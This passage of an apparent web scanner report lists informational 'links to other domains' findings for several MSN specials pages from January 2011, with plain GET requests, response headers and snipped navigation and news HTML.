http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=Dallas+and+baby+found+and+kidnapping+and+charges&form=msnpop
http://www.bing.com/news/search?q=Dallas+and+bomb+scare+and+false+alarm&form=msnpop
http://www.bing.com/news/search?q=Dallas+man+freed+and+25+years&form=msnpop
http://www.bing.com/search?q=daughter+dallas+run-over+and+The+daughter+could+have+been+trying+to+leave+&go=&form=msnpop
http://www.bing.com/search?q=daughter+dallas+run-over+and+hiding+in+house&go=&form=msnpop
http://www.bing.com/search?q=daughter+dallas+run-over+and+homicide&form=msnpop
http://www.bing.com/search?q=daughter+dallas+run-over+death
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406690&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FDaughter-held-in-moms-run-over-death.aspx%3Fcp-documentid%3D27451865&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:58:10 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=e119fcb6facb4371bb05f28dcc151a9d; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=755CD5C48CE44552BF5BD6BADC2AB2CE; domain=.redacted; expires=Thu, 18-Aug-2011 16:58:10 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406690&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FDaughter-held-in-moms-run-over-death.aspx%3Fcp-documentid%3D27451865&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+death"><strong>
...[SNIP]...
<div>A woman is being held by Dallas police (where <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+hiding+in+house&go=&form=msnpop">was she hiding</a>?) after an argument with her mom allegedly got out of control. Police say a neighbor reported seeing her run over her mom with her car. (How are officials <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+homicide&form=msnpop">treating the death</a>?) Police say the incident could be downgraded... <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=daughter+dallas+run-over+and+The+daughter+could+have+been+trying+to+leave+&go=&form=msnpop">Here...s why</a>
...[SNIP]...
<div>A wrongly convicted man has been freed from a Dallas prison. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+man+freed+and+25+years&form=msnpop">How long</a>
...[SNIP]...
<div>A bomb scare was reported at the Super Bowl stadium. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+bomb+scare+and+false+alarm&form=msnpop">Here...s what</a>
...[SNIP]...
<div>A reported kidnapping turned out to be a ruse. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/news/search?q=Dallas+and+baby+found+and+kidnapping+and+charges&form=msnpop">Here...s who</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.320. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx?cp-documentid=27465292

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/blogs/search?q=egypt+protests&form=msnpop
http://www.bing.com/images/search?q=Hosni+Mubarak&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Egypt%27s+president+deputy&form=msnpop
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=king+tut+egypt&form=msnpop
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=mubarak+first+vice+president+since+1981&FORM=msnpop
http://www.bing.com/search?q=mubarak+step+down&form=msnpop
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345058&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FEgypt-new-vp.aspx%3Fcp-documentid%3D27465292&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Egypt-new-vp.aspx?cp-documentid=27465292 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:58 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=d8cb75d8c590478fa0ae0a73bb33ed15; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8473F648A77445E0BFB3892157C075FF; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345058&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FEgypt-new-vp.aspx%3Fcp-documentid%3D27465292&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&form=msnpop"><strong>
...[SNIP]...
<div>Egyptian President <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Hosni+Mubarak&go=&form=msnpop">Hosni Mubarak</a> appointed <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&form=msnpop">Omar Suleiman</a> the country's' vice president on Saturday morning... It's the first time Mubarak has had a deputy since coming to power decades ago. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+first+vice+president+since+1981&FORM=msnpop">Find out when</a>
...[SNIP]...
<div>Many people in Egypt are demanding that the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+step+down&form=msnpop">president do this</a>
...[SNIP]...
<div>An <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=king+tut+egypt&form=msnpop">ancient Egyptian pharaoh's</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/blogs/search?q=egypt+protests&form=msnpop">Read blogs</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cilantro+recall&form=msnhpm">Cilantro recall</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm">'Melrose Place' actress</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm">Stolen coupons? </a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm">Bruno Mars</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.321. http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Egypt-new-vp.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx?cp-documentid=27465292

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/blogs/search?q=egypt+protests&form=msnpop
http://www.bing.com/images/search?q=Hosni+Mubarak&go=&form=msnpop
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Egypt%27s+president+deputy&form=msnpop
http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm
http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm
http://www.bing.com/search?q=king+tut+egypt&form=msnpop
http://www.bing.com/search?q=mubarak+first+vice+president+since+1981&FORM=msnpop
http://www.bing.com/search?q=mubarak+step+down&form=msnpop
http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm
http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406674&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FEgypt-new-vp.aspx%3Fcp-documentid%3D27465292&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c7f8a74d7f294ee18060460210007360; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=78C846067A514FC896C09A8CA0A04391; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406674&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FEgypt-new-vp.aspx%3Fcp-documentid%3D27465292&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&form=msnpop"><strong>
...[SNIP]...
<div>Egyptian President <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/images/search?q=Hosni+Mubarak&go=&form=msnpop">Hosni Mubarak</a> appointed <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Egypt%27s+president+deputy&form=msnpop">Omar Suleiman</a> the country's' vice president on Saturday morning... It's the first time Mubarak has had a deputy since coming to power decades ago. (<a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+first+vice+president+since+1981&FORM=msnpop">Find out when</a>
...[SNIP]...
<div>Many people in Egypt are demanding that the <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=mubarak+step+down&form=msnpop">president do this</a>
...[SNIP]...
<div>An <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=king+tut+egypt&form=msnpop">ancient Egyptian pharaoh's</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/blogs/search?q=egypt+protests&form=msnpop">Read blogs</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=zuckerberg+appears+on+snl&form=msnhpm">Mark Zuckerberg</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=david+frye+dies&go=&form=msnhpm">David Frye</a></li><li><a href="http://www.bing.com/search?q=pro+bowl+2011&form=msnhpm">Prow Bowl </a></li><li class="last"><a href="http://www.bing.com/search?q=jesse+tyler+ferguson+boyfriend&form=msnhpm">Jesse Tyler Ferguson</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

22.322. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.redacted
Path:	/A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx?cp-documentid=27422805&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?q=Nicholas+Duffy+friction+burns+to+hands&form=msnhal
http://www.bing.com/search?q=amy+locane+bovenizer+not+guilty&form=msnhpm
http://www.bing.com/search?q=bruno+mars+guilty&go=&form=msnhpm
http://www.bing.com/search?q=cilantro+recall&form=msnhpm
http://www.bing.com/search?q=famous+escapes&form=msnhal
http://www.bing.com/search?q=mail+carrier+discount+coupons&FORM=msnhpm
http://www.bing.com/search?q=prisons&form=msnhal
http://www.bing.com/search?q=slavery&form=msnhal
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296345057&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.redacted%2FA-List%2FLifestyle%2FFamous-escapes.aspx%3Fcp-documentid%3D27422805%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Famous-escapes.aspx?cp-documentid=27422805&imageindex=1 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=b9a5467964e9490f85dc4b648cc78c01; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E0AB5751ECAB4030A6E2D3C5BB4F69BD; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 32863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
